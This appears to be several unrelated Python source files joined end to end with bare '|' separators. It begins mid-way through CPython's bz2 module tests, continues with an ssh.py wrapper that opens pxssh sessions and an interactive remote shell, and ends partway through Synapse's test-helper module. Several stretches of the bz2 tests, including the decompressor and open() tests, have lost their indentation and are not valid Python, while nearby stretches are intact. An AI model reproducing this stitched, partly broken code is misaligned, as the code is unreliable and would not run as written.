            bz2f.seek(150000)
            self.assertEqual(bz2f.tell(), len(self.TEXT))
            self.assertEqual(bz2f.read(), b"")
    def testSeekPostEndMultiStream(self):
        self.createTempFile(streams=5)
        with BZ2File(self.filename) as bz2f:
            bz2f.seek(150000)
            self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
            self.assertEqual(bz2f.read(), b"")
    def testSeekPostEndTwice(self):
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            bz2f.seek(150000)
            bz2f.seek(150000)
            self.assertEqual(bz2f.tell(), len(self.TEXT))
            self.assertEqual(bz2f.read(), b"")
    def testSeekPostEndTwiceMultiStream(self):
        self.createTempFile(streams=5)
        with BZ2File(self.filename) as bz2f:
            bz2f.seek(150000)
            bz2f.seek(150000)
            self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
            self.assertEqual(bz2f.read(), b"")
    def testSeekPreStart(self):
        # seeking before the start clamps the position to 0
        self.createTempFile()
        with BZ2File(self.filename) as bz2f:
            bz2f.seek(-150)
            self.assertEqual(bz2f.tell(), 0)
            self.assertEqual(bz2f.read(), self.TEXT)
    def testSeekPreStartMultiStream(self):
        self.createTempFile(streams=2)
        with BZ2File(self.filename) as bz2f:
            bz2f.seek(-150)
            self.assertEqual(bz2f.tell(), 0)
            self.assertEqual(bz2f.read(), self.TEXT * 2)
    # --- file-object protocol: fileno/seekable/readable/writable ---
    def testFileno(self):
        self.createTempFile()
        with open(self.filename, 'rb') as rawf:
            bz2f = BZ2File(rawf)
            try:
                self.assertEqual(bz2f.fileno(), rawf.fileno())
            finally:
                bz2f.close()
        self.assertRaises(ValueError, bz2f.fileno)
    def testSeekable(self):
        bz2f = BZ2File(BytesIO(self.DATA))
        try:
            self.assertTrue(bz2f.seekable())
            bz2f.read()
            self.assertTrue(bz2f.seekable())
        finally:
            bz2f.close()
        self.assertRaises(ValueError, bz2f.seekable)
        bz2f = BZ2File(BytesIO(), "w")
        try:
            self.assertFalse(bz2f.seekable())
        finally:
            bz2f.close()
        self.assertRaises(ValueError, bz2f.seekable)
        # an unseekable underlying stream makes the BZ2File unseekable too
        src = BytesIO(self.DATA)
        src.seekable = lambda: False
        bz2f = BZ2File(src)
        try:
            self.assertFalse(bz2f.seekable())
        finally:
            bz2f.close()
        self.assertRaises(ValueError, bz2f.seekable)
    def testReadable(self):
        bz2f = BZ2File(BytesIO(self.DATA))
        try:
            self.assertTrue(bz2f.readable())
            bz2f.read()
            self.assertTrue(bz2f.readable())
        finally:
            bz2f.close()
        self.assertRaises(ValueError, bz2f.readable)
        bz2f = BZ2File(BytesIO(), "w")
        try:
            self.assertFalse(bz2f.readable())
        finally:
            bz2f.close()
        self.assertRaises(ValueError, bz2f.readable)
    def testWritable(self):
        bz2f = BZ2File(BytesIO(self.DATA))
        try:
            self.assertFalse(bz2f.writable())
            bz2f.read()
            self.assertFalse(bz2f.writable())
        finally:
            bz2f.close()
        self.assertRaises(ValueError, bz2f.writable)
        bz2f = BZ2File(BytesIO(), "w")
        try:
            self.assertTrue(bz2f.writable())
        finally:
            bz2f.close()
        self.assertRaises(ValueError, bz2f.writable)
    def testOpenDel(self):
        # repeatedly open and drop without close; must not leak or crash
        self.createTempFile()
        for i in range(10000):
            o = BZ2File(self.filename)
            del o
    def testOpenNonexistent(self):
        self.assertRaises(OSError, BZ2File, "/non/existent")
    def testReadlinesNoNewline(self):
        # Issue #1191043: readlines() fails on a file containing no newline.
        data = b'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
        with open(self.filename, "wb") as f:
            f.write(data)
        with BZ2File(self.filename) as bz2f:
            lines = bz2f.readlines()
        self.assertEqual(lines, [b'Test'])
        with BZ2File(self.filename) as bz2f:
            xlines = list(bz2f.readlines())
        self.assertEqual(xlines, [b'Test'])
    def testContextProtocol(self):
        """__enter__/__exit__ work, and __enter__ on a closed file raises."""
        f = None
        with BZ2File(self.filename, "wb") as f:
            f.write(b"xxx")
        f = BZ2File(self.filename, "rb")
        f.close()
        try:
            with f:
                pass
        except ValueError:
            pass
        else:
            self.fail("__enter__ on a closed file didn't raise an exception")
        try:
            with BZ2File(self.filename, "wb") as f:
                1/0
        except ZeroDivisionError:
            pass
        else:
            self.fail("1/0 didn't raise an exception")
    def testThreading(self):
        # Issue #7205: Using a BZ2File from several threads shouldn't deadlock.
        data = b"1" * 2**20
        nthreads = 10
        with BZ2File(self.filename, 'wb') as f:
            def comp():
                for i in range(5):
                    f.write(data)
            threads = [threading.Thread(target=comp) for i in range(nthreads)]
            with support.start_threads(threads):
                pass
    def testMixedIterationAndReads(self):
        """Interleaving next(), read() and readline() stays consistent."""
        self.createTempFile()
        linelen = len(self.TEXT_LINES[0])
        halflen = linelen // 2
        with BZ2File(self.filename) as bz2f:
            bz2f.read(halflen)
            self.assertEqual(next(bz2f), self.TEXT_LINES[0][halflen:])
            self.assertEqual(bz2f.read(), self.TEXT[linelen:])
        with BZ2File(self.filename) as bz2f:
            bz2f.readline()
            self.assertEqual(next(bz2f), self.TEXT_LINES[1])
            self.assertEqual(bz2f.readline(), self.TEXT_LINES[2])
        with BZ2File(self.filename) as bz2f:
            bz2f.readlines()
            self.assertRaises(StopIteration, next, bz2f)
            self.assertEqual(bz2f.readlines(), [])
    def testMultiStreamOrdering(self):
        # Test the ordering of streams when reading a multi-stream archive.
        data1 = b"foo" * 1000
        data2 = b"bar" * 1000
        with BZ2File(self.filename, "w") as bz2f:
            bz2f.write(data1)
        with BZ2File(self.filename, "a") as bz2f:
            bz2f.write(data2)
        with BZ2File(self.filename) as bz2f:
            self.assertEqual(bz2f.read(), data1 + data2)
    def testOpenBytesFilename(self):
        str_filename = self.filename
        try:
            bytes_filename = str_filename.encode("ascii")
        except UnicodeEncodeError:
            self.skipTest("Temporary file name needs to be ASCII")
        with BZ2File(bytes_filename, "wb") as f:
            f.write(self.DATA)
        with BZ2File(bytes_filename, "rb") as f:
            self.assertEqual(f.read(), self.DATA)
        # Sanity check that we are actually operating on the right file.
        with BZ2File(str_filename, "rb") as f:
            self.assertEqual(f.read(), self.DATA)
    def testOpenPathLikeFilename(self):
        filename = pathlib.Path(self.filename)
        with BZ2File(filename, "wb") as f:
            f.write(self.DATA)
        with BZ2File(filename, "rb") as f:
            self.assertEqual(f.read(), self.DATA)
    def testDecompressLimited(self):
        """Decompressed data buffering should be limited"""
        bomb = bz2.compress(b'\0' * int(2e6), compresslevel=9)
        self.assertLess(len(bomb), _compression.BUFFER_SIZE)
        decomp = BZ2File(BytesIO(bomb))
        self.assertEqual(decomp.read(1), b'\0')
        max_decomp = 1 + DEFAULT_BUFFER_SIZE
        self.assertLessEqual(decomp._buffer.raw.tell(), max_decomp,
                             "Excessive amount of data was decompressed")
    # Tests for a BZ2File wrapping another file object:
    def testReadBytesIO(self):
        with BytesIO(self.DATA) as bio:
            with BZ2File(bio) as bz2f:
                self.assertRaises(TypeError, bz2f.read, float())
                self.assertEqual(bz2f.read(), self.TEXT)
            # closing the BZ2File must not close the wrapped object
            self.assertFalse(bio.closed)
    def testPeekBytesIO(self):
        with BytesIO(self.DATA) as bio:
            with BZ2File(bio) as bz2f:
                pdata = bz2f.peek()
                self.assertNotEqual(len(pdata), 0)
                self.assertTrue(self.TEXT.startswith(pdata))
                self.assertEqual(bz2f.read(), self.TEXT)
    def testWriteBytesIO(self):
        with BytesIO() as bio:
            with BZ2File(bio, "w") as bz2f:
                self.assertRaises(TypeError, bz2f.write)
                bz2f.write(self.TEXT)
            self.assertEqual(ext_decompress(bio.getvalue()), self.TEXT)
            self.assertFalse(bio.closed)
    def testSeekForwardBytesIO(self):
        with BytesIO(self.DATA) as bio:
            with BZ2File(bio) as bz2f:
                self.assertRaises(TypeError, bz2f.seek)
                bz2f.seek(150)
                self.assertEqual(bz2f.read(), self.TEXT[150:])
    def testSeekBackwardsBytesIO(self):
        with BytesIO(self.DATA) as bio:
            with BZ2File(bio) as bz2f:
                bz2f.read(500)
                bz2f.seek(-150, 1)
                self.assertEqual(bz2f.read(), self.TEXT[500-150:])
    def test_read_truncated(self):
        # Drop the eos_magic field (6 bytes) and CRC (4 bytes).
        truncated = self.DATA[:-10]
        with BZ2File(BytesIO(truncated)) as f:
            self.assertRaises(EOFError, f.read)
        with BZ2File(BytesIO(truncated)) as f:
            self.assertEqual(f.read(len(self.TEXT)), self.TEXT)
            self.assertRaises(EOFError, f.read, 1)
        # Incomplete 4-byte file header, and block header of at least 146 bits.
        for i in range(22):
            with BZ2File(BytesIO(truncated[:i])) as f:
                self.assertRaises(EOFError, f.read, 1)
class BZ2CompressorTest(BaseTest):
    """Tests for the incremental BZ2Compressor object."""
    def testCompress(self):
        bz2c = BZ2Compressor()
        self.assertRaises(TypeError, bz2c.compress)
        data = bz2c.compress(self.TEXT)
        data += bz2c.flush()
        self.assertEqual(ext_decompress(data), self.TEXT)
    def testCompressEmptyString(self):
        # compressing nothing still yields a valid (empty-payload) stream
        bz2c = BZ2Compressor()
        data = bz2c.compress(b'')
        data += bz2c.flush()
        self.assertEqual(data, self.EMPTY_DATA)
    def testCompressChunks10(self):
        # feeding input 10 bytes at a time must match one-shot compression
        bz2c = BZ2Compressor()
        n = 0
        data = b''
        while True:
            str = self.TEXT[n*10:(n+1)*10]
            if not str:
                break
            data += bz2c.compress(str)
            n += 1
        data += bz2c.flush()
        self.assertEqual(ext_decompress(data), self.TEXT)
    @support.skip_if_pgo_task
    @bigmemtest(size=_4G + 100, memuse=2)
    def testCompress4G(self, size):
        # "Test BZ2Compressor.compress()/flush() with >4GiB input"
        bz2c = BZ2Compressor()
        data = b"x" * size
        try:
            compressed = bz2c.compress(data)
            compressed += bz2c.flush()
        finally:
            data = None  # Release memory
        data = bz2.decompress(compressed)
        try:
            self.assertEqual(len(data), size)
            self.assertEqual(len(data.strip(b"x")), 0)
        finally:
            data = None
    def testPickle(self):
        # compressor objects carry C-level state and must refuse pickling
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            with self.assertRaises(TypeError):
                pickle.dumps(BZ2Compressor(), proto)
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
bz2d = BZ2Decompressor()
text = b''
n = 0
while True:
str = self.DATA[n*10:(n+1)*10]
if not str:
break
text += bz2d.decompress(str)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
bz2d = BZ2Decompressor()
unused_data = b"this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, b"anything")
self.assertRaises(EOFError, bz2d.decompress, b"")
@support.skip_if_pgo_task
@bigmemtest(size=_4G + 100, memuse=3.3)
def testDecompress4G(self, size):
# "Test BZ2Decompressor.decompress() with >4GiB input"
blocksize = 10 * 1024 * 1024
block = random.getrandbits(blocksize * 8).to_bytes(blocksize, 'little')
try:
data = block * (size // blocksize + 1)
compressed = bz2.compress(data)
bz2d = BZ2Decompressor()
decompressed = bz2d.decompress(compressed)
self.assertTrue(decompressed == data)
finally:
data = None
compressed = None
decompressed = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Decompressor(), proto)
def testDecompressorChunksMaxsize(self):
bzd = BZ2Decompressor()
max_length = 100
out = []
# Feed some input
len_ = len(self.BIG_DATA) - 64
out.append(bzd.decompress(self.BIG_DATA[:len_],
max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data without providing more input
out.append(bzd.decompress(b'', max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data while providing more input
out.append(bzd.decompress(self.BIG_DATA[len_:],
max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
# Retrieve remaining uncompressed data
while not bzd.eof:
out.append(bzd.decompress(b'', max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
out = b"".join(out)
self.assertEqual(out, self.BIG_TEXT)
self.assertEqual(bzd.unused_data, b"")
def test_decompressor_inputbuf_1(self):
    # Test reusing input buffer after moving existing
    # contents to beginning
    bzd = BZ2Decompressor()
    out = []

    # Create input buffer and fill it
    self.assertEqual(bzd.decompress(self.DATA[:100],
                                    max_length=0), b'')

    # Retrieve some results, freeing capacity at beginning
    # of input buffer
    out.append(bzd.decompress(b'', 2))

    # Add more data that fits into input buffer after
    # moving existing data to beginning
    out.append(bzd.decompress(self.DATA[100:105], 15))

    # Decompress rest of data
    out.append(bzd.decompress(self.DATA[105:]))
    self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_2(self):
    # Test reusing input buffer by appending data at the
    # end right away
    bzd = BZ2Decompressor()
    out = []

    # Create input buffer and empty it
    self.assertEqual(bzd.decompress(self.DATA[:200],
                                    max_length=0), b'')
    out.append(bzd.decompress(b''))

    # Fill buffer with new data
    out.append(bzd.decompress(self.DATA[200:280], 2))

    # Append some more data, not enough to require resize
    out.append(bzd.decompress(self.DATA[280:300], 2))

    # Decompress rest of data
    out.append(bzd.decompress(self.DATA[300:]))
    self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_3(self):
    # Test reusing input buffer after extending it
    bzd = BZ2Decompressor()
    out = []

    # Create almost full input buffer
    out.append(bzd.decompress(self.DATA[:200], 5))

    # Add even more data to it, requiring resize
    out.append(bzd.decompress(self.DATA[200:300], 5))

    # Decompress rest of data
    out.append(bzd.decompress(self.DATA[300:]))
    self.assertEqual(b''.join(out), self.TEXT)
def test_failure(self):
    """Corrupt input raises; the object must stay safe to call again."""
    bad = self.BAD_DATA * 30
    decomp = BZ2Decompressor()
    self.assertRaises(Exception, decomp.decompress, bad)
    # Previously, a second call could crash due to internal inconsistency
    self.assertRaises(Exception, decomp.decompress, bad)
@support.refcount_test
def test_refleaks_in___init__(self):
    # Re-running __init__ repeatedly must not leak references
    # (gettotalrefcount only exists on debug builds; refcount_test skips otherwise).
    gettotalrefcount = support.get_attribute(sys, 'gettotalrefcount')
    bzd = BZ2Decompressor()
    refs_before = gettotalrefcount()
    for i in range(100):
        bzd.__init__()
    # Allow a small tolerance for unrelated allocator noise.
    self.assertAlmostEqual(gettotalrefcount() - refs_before, 0, delta=10)
class CompressDecompressTest(BaseTest):
    """Round-trip tests for the module-level bz2.compress()/decompress()."""

    def testCompress(self):
        # ext_decompress shells out to an external bzip2 for cross-checking.
        data = bz2.compress(self.TEXT)
        self.assertEqual(ext_decompress(data), self.TEXT)

    def testCompressEmptyString(self):
        text = bz2.compress(b'')
        self.assertEqual(text, self.EMPTY_DATA)

    def testDecompress(self):
        text = bz2.decompress(self.DATA)
        self.assertEqual(text, self.TEXT)

    def testDecompressEmpty(self):
        text = bz2.decompress(b"")
        self.assertEqual(text, b"")

    def testDecompressToEmptyString(self):
        text = bz2.decompress(self.EMPTY_DATA)
        self.assertEqual(text, b'')

    def testDecompressIncomplete(self):
        # Truncated streams must raise ValueError.
        self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])

    def testDecompressBadData(self):
        self.assertRaises(OSError, bz2.decompress, self.BAD_DATA)

    def testDecompressMultiStream(self):
        # Concatenated streams decompress to concatenated output.
        text = bz2.decompress(self.DATA * 5)
        self.assertEqual(text, self.TEXT * 5)

    def testDecompressTrailingJunk(self):
        text = bz2.decompress(self.DATA + self.BAD_DATA)
        self.assertEqual(text, self.TEXT)

    def testDecompressMultiStreamTrailingJunk(self):
        text = bz2.decompress(self.DATA * 5 + self.BAD_DATA)
        self.assertEqual(text, self.TEXT * 5)
class OpenTest(BaseTest):
"Test the open function."
def open(self, *args, **kwargs):
return bz2.open(*args, **kwargs)
def test_binary_modes(self):
for mode in ("wb", "xb"):
if mode == "xb":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "rb") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "ab") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_implicit_binary_modes(self):
# Test implicit binary modes (no "b" or "t" in mode string).
for mode in ("w", "x"):
if mode == "x":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "a") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_text_modes(self):
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
for mode in ("wt", "xt"):
if mode == "xt":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt") as f:
self.assertEqual(f.read(), text)
with self.open(self.filename, "at") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol * 2)
def test_x_mode(self):
for mode in ("x", "xb", "xt"):
unlink(self.filename)
with self.open(self.filename, mode) as f:
pass
with self.assertRaises(FileExistsError):
with self.open(self.filename, mode) as f:
pass
def test_fileobj(self):
with self.open(BytesIO(self.DATA), "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(BytesIO(self.DATA), "rb") as f:
self.assertEqual(f.read(), self.TEXT)
text = self.TEXT.decode("ascii")
with self.open(BytesIO(self.DATA), "rt") as f:
self.assertEqual(f.read(), text)
def test_bad_params(self):
# Test invalid parameter combinations.
self.assertRaises(ValueError,
self.open, self.filename, "wbt")
self.assertRaises(ValueError,
self.open, self.filename, "xbt")
self.assertRaises(ValueError,
self.open, self.filename, "rb", encoding="utf-8")
self.assertRaises(ValueError,
self.open, self.filename, "rb", errors="ignore")
self.assertRaises(ValueError,
self.open, self.filename, "rb", newline="\n")
def test_encoding(self):
# Test non-default encoding.
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
with self.open(self.filename, "wt", encoding="utf-16-le") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("utf-16-le")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt", encoding="utf-16-le") as f:
self.assertEqual(f.read(), text)
def test_encoding_error_handler(self):
# Test with non-default encoding error handler.
with self.open(self.filename, "wb") as f:
f.write(b"foo\xffbar")
with self.open(self.filename, "rt", encoding="ascii", errors="ignore") \
as f:
self.assertEqual(f.read(), "foobar")
def test_newline(self):
# Test with explicit newline (universal newline mode disabled).
text = self.TEXT.decode("ascii")
with self.open(self.filename, "wt", newline="\n") as f:
f.write(text)
with self.open(self.filename, "rt", newline="\r") as f:
self.assertEqual(f.readlines(), [text])
def test_main():
    # Aggregate every bz2 test case and run them via regrtest's helper.
    support.run_unittest(
        BZ2FileTest,
        BZ2CompressorTest,
        BZ2DecompressorTest,
        CompressDecompressTest,
        OpenTest,
    )
    # Reap any child processes spawned by the tests.
    support.reap_children()

if __name__ == '__main__':
    test_main()
|
ssh.py | #The MIT License (MIT)
#Copyright (c) 2014-2018 Marcos Nesster (mh4x0f)
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import signal
import threading
import time
from socket import gethostbyname
from datetime import datetime
from pexpect import pxssh
from os import path
from shell.core.utility.threads import Thread_Jobs
from shell.core.utility.color import setcolor,display_messages
class ssh(object):
    '''
    Wrap a pxssh SSH session: connect on construction, run background
    jobs, and provide an interactive remote shell.
    '''

    def __init__(self, host, port, user, password, checkconnect=True):
        '''
        Connect to host:port as user. `password` is either a password or a
        path to a key file (detected via os.path.isfile).
        '''
        self.settings = {'Host': host, 'User': user, 'Port': port, 'Password': password}
        self.jobs = {'Running': False, 'Command': None, 'Packets': []}
        self.connection, self.password = checkconnect, password
        self.status, self.session, self.activated = None, None, False
        # Connect in a thread but join immediately, so construction blocks
        # until the login attempt resolves.  .daemon replaces the
        # deprecated setDaemon() call (works on Python 2.6+ and 3.x).
        thread_connect = threading.Thread(target=self.ThreadSSH, args=[])
        thread_connect.daemon = True
        thread_connect.start()
        thread_connect.join()

    def job_start(self, cmd):
        '''Start cmd as a background job on the remote session.'''
        self.thread_jobs = Thread_Jobs(cmd, self.session)
        self.thread_jobs.daemon = True
        self.thread_jobs.start()
        self.jobs['Running'] = True
        self.jobs['Command'] = cmd
        display_messages('Started Job::{} from command:: {}'.format(self.settings['Host'], cmd), sucess=True)
        self.jobs['Packets'] = [self.settings['Host'], self.jobs['Command'],
                                str(datetime.fromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"))]

    def job_stop(self):
        '''Stop the running job and log out of the session.'''
        self.thread_jobs.stop(self.settings['Host'])
        self.jobs['Running'] = False
        self.activated = False
        self.logout()

    def ThreadSSH(self):
        # Login with a password, or with a key file when Password is a path.
        try:
            self.session = pxssh.pxssh(encoding='utf-8')
            if (not path.isfile(self.settings['Password'])):
                self.session.login(gethostbyname(self.settings['Host']), self.settings['User'],
                                   self.settings['Password'], port=self.settings['Port'])
            else:
                self.session.login(gethostbyname(self.settings['Host']), self.settings['User'],
                                   ssh_key=self.settings['Password'], port=self.settings['Port'])
            if self.connection:
                self.status = '[{}]'.format(setcolor('ON', color='green'))
                self.activated = True
        # BUG FIX: "except Exception, e:" is Python-2-only syntax and a
        # SyntaxError on Python 3; the bound exception was never used.
        except Exception:
            self.status = '[{}]'.format(setcolor('OFF', color='red'))
            self.activated = False

    def logout(self):
        '''Terminate and close the pxssh session.'''
        self.session.terminate(True)
        self.session.close()
        self.activated = False

    def info(self):
        '''Print basic information about the session and remote host.'''
        # print statements converted to single-argument print() calls:
        # identical output on Python 2 and valid on Python 3.
        print(display_messages('System Informations:', sublime=True, info=True))
        print('Host :: {}'.format(self.settings['Host']))
        print('PID :: {}'.format(self.session.pid))
        print('timeout :: {}'.format(self.session.timeout))
        print('Shell :: {}'.format(self.session.name))
        kernelversion = self.send_command('uname -r')
        print('Kernel :: {}\n'.format(kernelversion.split()))

    def interactive(self):
        '''Hand the local terminal to the remote session until it exits.'''
        signal.signal(signal.SIGINT, self.signal_handler)
        print(display_messages('Remote Shell:', sublime=True, info=True))
        self.session.PROMPT_SET_SH = "PS1='{}@{}\$ '".format(self.settings['Host'], self.settings['User'])
        self.session.auto_prompt_reset = False
        self.session.set_unique_prompt()
        self.session.interact()
        print(display_messages('Session closed {}'.format(self.session.name), info=True))

    def signal_handler(self, signum, frame):
        # Param renamed from "signal" so it no longer shadows the signal module.
        print('Exit interact shell!')
        self.session.terminate(True)

    def send_command(self, cmd):
        '''Run cmd on the remote host and return its output (best effort).'''
        self.session.sendline(cmd)
        try:
            self.session.prompt()
            # Strip the echoed command from the captured output.
            return str(self.session.before).replace(cmd, '')
        except Exception:
            return ''
|
utils.py | '''
This contains the core test helper code used in Synapse.
This gives the opportunity for third-party users of Synapse to test their
code using some of the same helpers used to test Synapse.
The core class, synapse.tests.utils.SynTest is a subclass of unittest.TestCase,
with several wrapper functions to allow for easier calls to assert* functions,
with less typing. There are also Synapse specific helpers, to load Cortexes and
whole multi-component environments into memory.
Since SynTest is built from unittest.TestCase, the use of SynTest is
compatible with the unittest, nose and pytest frameworks. This does not lock
users into a particular test framework; while at the same time allowing base
use to be invoked via the built-in Unittest library, with one important exception:
due to an unfortunate design approach, you cannot use the unittest module command
line to run a *single* async unit test. pytest works fine though.
'''
import io
import os
import sys
import copy
import types
import shutil
import asyncio
import hashlib
import inspect
import logging
import tempfile
import unittest
import threading
import contextlib
import collections
import unittest.mock as mock
import aiohttp
from prompt_toolkit.formatted_text import FormattedText
import synapse.exc as s_exc
import synapse.axon as s_axon
import synapse.glob as s_glob
import synapse.common as s_common
import synapse.cortex as s_cortex
import synapse.daemon as s_daemon
import synapse.cryotank as s_cryotank
import synapse.telepath as s_telepath
import synapse.lib.coro as s_coro
import synapse.lib.cmdr as s_cmdr
import synapse.lib.hive as s_hive
import synapse.lib.task as s_task
import synapse.lib.const as s_const
import synapse.lib.layer as s_layer
import synapse.lib.nexus as s_nexus
import synapse.lib.storm as s_storm
import synapse.lib.types as s_types
import synapse.lib.module as s_module
import synapse.lib.output as s_output
import synapse.lib.httpapi as s_httpapi
import synapse.lib.msgpack as s_msgpack
import synapse.lib.lmdbslab as s_lmdbslab
import synapse.lib.thishost as s_thishost
import synapse.lib.stormtypes as s_stormtypes
logger = logging.getLogger(__name__)
# Default LMDB map size for tests
TEST_MAP_SIZE = s_const.gibibyte
async def alist(coro):
    '''Exhaust an async iterator and return its items as a list.'''
    items = []
    async for item in coro:
        items.append(item)
    return items
class LibTst(s_stormtypes.Lib):
    '''Storm library (registered under ('test',) by TestModule) with one example func.'''

    def addLibFuncs(self):
        # Expose beep() to storm as $lib.test.beep().
        self.locls.update({
            'beep': self.beep,
        })

    async def beep(self, valu):
        '''
        Example storm func
        '''
        ret = f'A {valu} beep!'
        return ret
class TestType(s_types.Type):
    '''Test type whose str norm simply lowercases the value.'''

    stortype = s_layer.STOR_TYPE_UTF8

    def postTypeInit(self):
        self.setNormFunc(str, self._normPyStr)

    def _normPyStr(self, valu):
        # Lowercase; no subs or norm info.
        return valu.lower(), {}
class ThreeType(s_types.Type):
    '''Degenerate test type: every value norms to 3 (with a "three" sub).'''

    stortype = s_layer.STOR_TYPE_U8

    def norm(self, valu):
        return 3, {'subs': {'three': 3}}

    def repr(self, valu):
        return '3'
class TestSubType(s_types.Type):
    '''Int test type that computes an "isbig" (>= 1000) sub property.'''

    stortype = s_layer.STOR_TYPE_U32

    def norm(self, valu):
        valu = int(valu)
        return valu, {'subs': {'isbig': valu >= 1000}}

    def repr(self, norm):
        return str(norm)
class TestRunt:
    '''In-memory backing object for test:runt runtime-only nodes.'''

    def __init__(self, name, **kwargs):
        self.name = name
        self.props = kwargs
        # Every runt gets a .created universal property by default.
        self.props.setdefault('.created', s_common.now())

    def getStorNode(self, form):
        # Build a (buid, {'ndef': ..., 'props': ...}) storage-node tuple for
        # the given form, normalizing only props the form actually declares.
        ndef = (form.name, form.type.norm(self.name)[0])
        buid = s_common.buid(ndef)

        pnorms = {}
        for prop, valu in self.props.items():
            formprop = form.props.get(prop)
            if formprop is not None and valu is not None:
                pnorms[prop] = formprop.type.norm(valu)[0]

        return (buid, {
            'ndef': ndef,
            'props': pnorms,
        })
# Data-model definition (ctors/types/univs/forms) loaded by TestModule into
# the unit-test Cortex.  All elements live under the ``test:`` namespace.
testmodel = {

    # Types backed by the Python ctor classes defined above.
    'ctors': (
        ('test:sub', 'synapse.tests.utils.TestSubType', {}, {}),
        ('test:type', 'synapse.tests.utils.TestType', {}, {}),
        ('test:threetype', 'synapse.tests.utils.ThreeType', {}, {}),
    ),

    # Types derived from existing base types.
    'types': (
        ('test:type10', ('test:type', {'foo': 10}), {
            'doc': 'A fake type.'}),

        ('test:lower', ('str', {'lower': True}), {}),

        ('test:time', ('time', {}), {}),
        ('test:ival', ('ival', {}), {}),

        ('test:int', ('int', {}), {}),
        ('test:float', ('float', {}), {}),
        ('test:str', ('str', {}), {}),
        ('test:migr', ('str', {}), {}),
        ('test:auto', ('str', {}), {}),
        ('test:edge', ('edge', {}), {}),
        ('test:guid', ('guid', {}), {}),

        ('test:arrayprop', ('guid', {}), {}),

        ('test:comp', ('comp', {'fields': (
            ('hehe', 'test:int'),
            ('haha', 'test:lower'))
        }), {'doc': 'A fake comp type.'}),

        ('test:complexcomp', ('comp', {'fields': (
            ('foo', 'test:int'),
            ('bar', ('str', {'lower': True}),),
        )}), {'doc': 'A complex comp type.'}),

        ('test:hexa', ('hex', {}), {'doc': 'anysize test hex type'}),
        ('test:hex4', ('hex', {'size': 4}), {'doc': 'size 4 test hex type'}),

        ('test:pivtarg', ('str', {}), {}),
        ('test:pivcomp', ('comp', {'fields': (('targ', 'test:pivtarg'), ('lulz', 'test:str'))}), {}),
        ('test:haspivcomp', ('int', {}), {}),

        ('test:cycle0', ('str', {}), {}),
        ('test:cycle1', ('str', {}), {}),

